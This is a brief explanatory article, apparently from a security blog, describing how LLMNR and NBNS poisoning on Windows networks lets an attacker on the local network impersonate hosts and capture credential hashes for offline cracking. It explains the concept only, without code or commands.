What is LLMNR and NBNS Poisoning?
When LLMNR protocol was introduced within Microsoft Windows Vista, attackers quickly identified ways to take advantage of the way the protocol functions on a local network. Since the purpose of this protocol is to assist IPv4 and IPv6 systems with resolving DNS names to IP addresses, the way it attempts to resolve DNS names can be manipulated.
Essentially, when a system with NBNS and LLMNR is enabled attempts to resolve a DNS name to its IP address, the following procedures are run:
- The system checks its local hosts file for static DNS to IP address mappings.
- If the hosts file does not have an entry, then the system asks its DNS server(s) to resolve the DNS names.
- If the DNS name does not contain the DNS to IP address mapping, then the system sends a broadcast LLMNR/NBNS query to ask other systems for assistance.
An attacker plays on this by listening to network traffic on your network and waiting for these broadcast queries to come across. Once discovered, the attacker responds to the system seeking assistance and impersonates the DNS name in question. So, for example, if System A is trying to resolve goog.com, the attacker responds to the broadcast and says “I am goo.com”. Depending on if System A is trying to authenticate via SMB, FTP, etc., that traffic is then sent to the attacker (since it assumes it’s the legitimate system).
In most environments when these attacks happen, attackers captured hashed user credentials. In some other cases, clear-text credentials can be observed through this process. Once an attacker has hashed user credentials, they are then able to perform offline brute-force and dictionary attacks to attempt revealing the clear-text password.